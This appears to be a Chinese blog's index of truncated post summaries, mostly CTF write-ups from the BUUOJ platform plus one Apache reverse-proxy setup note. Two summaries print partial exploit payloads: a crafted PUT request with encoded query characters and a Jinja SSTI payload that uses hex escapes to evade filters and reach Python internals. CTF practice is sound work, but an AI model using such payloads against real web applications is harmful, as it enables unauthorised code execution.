摘要：原理： docker中flask正常打开5000端口 然后物理机使用apache2开反向代理打127.0.0.1:5000 配置虚拟主机，ok 主要步骤： 配apache2 参考：https://www.jianshu.com/p/47eca94680aa a2enmod proxy proxy_b 阅读全文

摘要：这题就是一坨shi 用3.6以上的版本去反编译，linux环境下。 # uncompyle6 version 3.7.4 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.8.4 (default, Jul 13 2020, 21:16 阅读全文

摘要：参考赵总的文章：https://www.zhaoj.in/read-6497.html 非常详细了 over. 阅读全文

摘要：套娃 最终exp： PUT /hurdles/!?get=flag&%26%3d%26%3d%26=%2500%0a HTTP/1.1 Host: node3.buuoj.cn:26310 Upgrade-Insecure-Requests: 1 User-Agent: 1337 browser v 阅读全文

摘要：明显的ssti 过滤单引号，点，下划线 直接丢exp了 读源码 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fmro\x5f\x5f"][1]["\x5f\x5fsubclasses\x5f\x5f"]()[127]["\x5f\x5finit\x5f\x5f"][" 阅读全文